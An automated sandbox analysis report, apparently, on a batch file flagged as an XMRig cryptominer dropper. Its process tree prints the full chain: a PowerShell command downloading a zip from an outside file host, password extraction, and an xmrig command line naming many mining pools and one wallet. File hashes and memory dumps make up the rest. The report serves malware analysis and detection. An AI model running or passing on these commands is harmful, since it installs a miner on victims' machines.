Analysis

  • max time kernel
    2692s
  • max time network
    2674s
  • platform
    windows10-1703_x64
  • resource
    win10-20231020-en
  • resource tags

    arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01/11/2023, 16:49

General

  • Target

    exec - Copy (9).bat

  • Size

    265B

  • MD5

    9af2ed06e6ab40274fcf074efa29c149

  • SHA1

    27f6ffb68ea4a7269e172ac6c4f750ccbb7f4dae

  • SHA256

    f83a41d60790e114cfd91038dea87af4cc88733b24c36a0bd046a23352904977

  • SHA512

    cba0714e21a167b00b5b16588d30ae31dd09752d25faa671cf2108c02194288ba509758476449f69a621d1239fc9365287cbdc3e34fb856870cffed7dffbb467

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 64 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\exec - Copy (9).bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:580
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Invoke-WebRequest -Uri https://litter.catbox.moe/9wbtsy.zip -OutFile files.zip"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2984
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'files.zip' -DestinationPath '.'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "./7zr.exe e x.7z -pamogus6969"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4044
      • C:\Users\Admin\AppData\Local\Temp\7zr.exe
        "C:\Users\Admin\AppData\Local\Temp\7zr.exe" e x.7z -pamogus6969
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4516
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K start.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3804
      • C:\Users\Admin\AppData\Local\Temp\xmrig.exe
        xmrig.exe --donate-level 2 -o xmrpool.eu:9999 -u 88seE692F9h85d8sDL2wyRGML1WkYWdvr3fmH5FJnjXPbQTMjsVeVywUCJX9V4AP6S6coD1nTvvRNHF5ueYnBx8aFym1Txx -k --tls -o pool.xmrfast.com:9000 -u 88seE692F9h85d8sDL2wyRGML1WkYWdvr3fmH5FJnjXPbQTMjsVeVywUCJX9V4AP6S6coD1nTvvRNHF5ueYnBx8aFym1Txx -k --tls -o pool.supportxmr.com:443 -u 88seE692F9h85d8sDL2wyRGML1WkYWdvr3fmH5FJnjXPbQTMjsVeVywUCJX9V4AP6S6coD1nTvvRNHF5ueYnBx8aFym1Txx -k --tls -o pool.xmr.pt:9000 -u 88seE692F9h85d8sDL2wyRGML1WkYWdvr3fmH5FJnjXPbQTMjsVeVywUCJX9V4AP6S6coD1nTvvRNHF5ueYnBx8aFym1Txx -k --tls --coin monero -o xmr-us-west1.nanopool.org:14433 -u 88seE692F9h85d8sDL2wyRGML1WkYWdvr3fmH5FJnjXPbQTMjsVeVywUCJX9V4AP6S6coD1nTvvRNHF5ueYnBx8aFym1Txx --tls --coin monero -o monerohash.com:9999 -u 88seE692F9h85d8sDL2wyRGML1WkYWdvr3fmH5FJnjXPbQTMjsVeVywUCJX9V4AP6S6coD1nTvvRNHF5ueYnBx8aFym1Txx -k --tls -a rx/0 -o ca.monero.herominers.com:10191 -u 88seE692F9h85d8sDL2wyRGML1WkYWdvr3fmH5FJnjXPbQTMjsVeVywUCJX9V4AP6S6coD1nTvvRNHF5ueYnBx8aFym1Txx -k --tls -o pool.hashvault.pro:443 -u 88seE692F9h85d8sDL2wyRGML1WkYWdvr3fmH5FJnjXPbQTMjsVeVywUCJX9V4AP6S6coD1nTvvRNHF5ueYnBx8aFym1Txx -k --tls -o xmr.pool.gntl.co.uk:20009 -u 88seE692F9h85d8sDL2wyRGML1WkYWdvr3fmH5FJnjXPbQTMjsVeVywUCJX9V4AP6S6coD1nTvvRNHF5ueYnBx8aFym1Txx -k --tls
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:312

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    56efdb5a0f10b5eece165de4f8c9d799

    SHA1

    fa5de7ca343b018c3bfeab692545eb544c244e16

    SHA256

    6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

    SHA512

    91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    42a60aaed2f04bbc657aa27d3a83f45f

    SHA1

    1e99715469bfbf3cebe41cc7778c8f6d781aa748

    SHA256

    d9b2573593ada4747beed650b3ceaa344386d107a8bbcff9b55addf948f5da1f

    SHA512

    25e1972d8c88fb32d2e8c109625634c1c88f9f5b40112de381a770b6cac578566e8a479a4f23a0f75dcdaf9747a74a1e7bf854a39f91a3235f655ee7983fe14b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    5ad194f3e984f68c9d0addb0b0813515

    SHA1

    b72a889cdddfdf611e3ab896ce83e598ae19d964

    SHA256

    21a0bacb87244de2028ffc06d0b6d62b652e8e3b9a264328bbe731fc43671845

    SHA512

    54fc5f6099e19a24ca752cad37e14f435155dc10f2b6b608c9ef7f97ff9da8272782ff3a4e3aab1e0dcbb92e1343a4e9fb89ead68b4770a122b7889d29f1df70

  • C:\Users\Admin\AppData\Local\Temp\7zr.exe

    Filesize

    571KB

    MD5

    58fc6de6c4e5d2fda63565d54feb9e75

    SHA1

    0586248c327d21efb8787e8ea9f553ddc03493ec

    SHA256

    72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b

    SHA512

    e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

  • C:\Users\Admin\AppData\Local\Temp\7zr.exe

    Filesize

    571KB

    MD5

    58fc6de6c4e5d2fda63565d54feb9e75

    SHA1

    0586248c327d21efb8787e8ea9f553ddc03493ec

    SHA256

    72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b

    SHA512

    e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4h5ko4tq.3lg.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Local\Temp\files.zip

    Filesize

    2.6MB

    MD5

    bc2d23b8640cb0adeb6abedf21f8f1ad

    SHA1

    ea14b8511c87bb1853d315ed73e9f1cbbcf7997e

    SHA256

    7c74993c15f3ee8890047816ba52efc601fb901daf5a6c969aa04c934b1801f9

    SHA512

    c6b537e326de7cfeee32f11477a41bbf0d45dcf104ecbffa765af09e20fdb64f45e022a3ba9755bd61791fb7c44317018d66923b6f51223df2a2d34927f8dd42

  • C:\Users\Admin\AppData\Local\Temp\start.cmd

    Filesize

    1KB

    MD5

    9b02fd81dae8f292d7e69cfaf72d9204

    SHA1

    e5c6345f44dac6c97fdf5ba5e5f0826d6ce18ddb

    SHA256

    b459b571e881f3d083a869559e64b36bd80f77ca744211d2b79546aeed65d146

    SHA512

    0a103ae47320268607615515f8bdc6ed630426ca055c3208a5613513505ab21f699a75d69da51ebb0fb36aaa57a2babbeacc5e965b4e712d547311224ed80f2d

  • C:\Users\Admin\AppData\Local\Temp\x.7z

    Filesize

    2.3MB

    MD5

    44075a11a1f6f20c370b01141e9e010b

    SHA1

    d4107a6877af9b8f12df378c7b5d62dfc6a52549

    SHA256

    643c4865ebbc810c7ce157edab89c021d3d31f725d1a73d2f3c423b8fc778cb3

    SHA512

    f56451b623365e3dbd56eff083bf906a87f51511111aafe3f09ce649edf04fc8418f5d36f6d522c643cf57baff5fdca4c1d6901798fdbd88af8f0bb8c11583a2

  • C:\Users\Admin\AppData\Local\Temp\xmrig.exe

    Filesize

    7.9MB

    MD5

    4813fa6d610e180b097eae0ce636d2aa

    SHA1

    1e9cd17ea32af1337dd9a664431c809dd8a64d76

    SHA256

    9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc

    SHA512

    5463e61b9583dd7e73fc4c0f14252ce06bb1b24637fdf5c4b96b3452cf486b147c980e365ca6633d89e7cfe245131f528a7ecab2340251cef11cdeb49dac36aa

  • memory/312-159-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-182-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-208-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-207-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-206-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-205-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-204-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-203-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-202-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-165-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-200-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-199-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-198-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-197-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-196-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-195-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-194-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-193-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-192-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-140-0x000001EF792C0000-0x000001EF792E0000-memory.dmp

    Filesize

    128KB

  • memory/312-141-0x000001EF79310000-0x000001EF79350000-memory.dmp

    Filesize

    256KB

  • memory/312-142-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-143-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-144-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-163-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-146-0x000001EF79350000-0x000001EF79370000-memory.dmp

    Filesize

    128KB

  • memory/312-147-0x000001EF79370000-0x000001EF79390000-memory.dmp

    Filesize

    128KB

  • memory/312-148-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-149-0x000001EF79350000-0x000001EF79370000-memory.dmp

    Filesize

    128KB

  • memory/312-150-0x000001EF79370000-0x000001EF79390000-memory.dmp

    Filesize

    128KB

  • memory/312-151-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-152-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-153-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-154-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-155-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-156-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-157-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-158-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-191-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-160-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-161-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-162-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-145-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-190-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-201-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-166-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-167-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-168-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-169-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-170-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-171-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-172-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-173-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-174-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-175-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-176-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-177-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-178-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-179-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-180-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-181-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-164-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-183-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-184-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-185-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-186-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-187-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-188-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/312-189-0x00007FF616120000-0x00007FF616C23000-memory.dmp

    Filesize

    11.0MB

  • memory/2984-9-0x0000012DEF7D0000-0x0000012DEF7E0000-memory.dmp

    Filesize

    64KB

  • memory/2984-4-0x0000012DEFAF0000-0x0000012DEFB12000-memory.dmp

    Filesize

    136KB

  • memory/2984-7-0x0000012DEFCA0000-0x0000012DEFD16000-memory.dmp

    Filesize

    472KB

  • memory/2984-8-0x00007FFDCFC70000-0x00007FFDD065C000-memory.dmp

    Filesize

    9.9MB

  • memory/2984-18-0x0000012DEF7D0000-0x0000012DEF7E0000-memory.dmp

    Filesize

    64KB

  • memory/2984-26-0x0000012DEF7D0000-0x0000012DEF7E0000-memory.dmp

    Filesize

    64KB

  • memory/2984-34-0x00007FFDCFC70000-0x00007FFDD065C000-memory.dmp

    Filesize

    9.9MB

  • memory/3416-103-0x00007FFDCFC70000-0x00007FFDD065C000-memory.dmp

    Filesize

    9.9MB

  • memory/3416-94-0x000001BDB2CA0000-0x000001BDB2CAA000-memory.dmp

    Filesize

    40KB

  • memory/3416-81-0x000001BDB2CB0000-0x000001BDB2CC2000-memory.dmp

    Filesize

    72KB

  • memory/3416-67-0x000001BDB2A80000-0x000001BDB2A90000-memory.dmp

    Filesize

    64KB

  • memory/3416-41-0x000001BDB2A80000-0x000001BDB2A90000-memory.dmp

    Filesize

    64KB

  • memory/3416-42-0x000001BDB2A80000-0x000001BDB2A90000-memory.dmp

    Filesize

    64KB

  • memory/3416-39-0x00007FFDCFC70000-0x00007FFDD065C000-memory.dmp

    Filesize

    9.9MB

  • memory/4044-110-0x0000023B72E50000-0x0000023B72E60000-memory.dmp

    Filesize

    64KB

  • memory/4044-106-0x00007FFDCFC70000-0x00007FFDD065C000-memory.dmp

    Filesize

    9.9MB

  • memory/4044-108-0x0000023B72E50000-0x0000023B72E60000-memory.dmp

    Filesize

    64KB

  • memory/4044-133-0x0000023B72E50000-0x0000023B72E60000-memory.dmp

    Filesize

    64KB

  • memory/4044-136-0x00007FFDCFC70000-0x00007FFDD065C000-memory.dmp

    Filesize

    9.9MB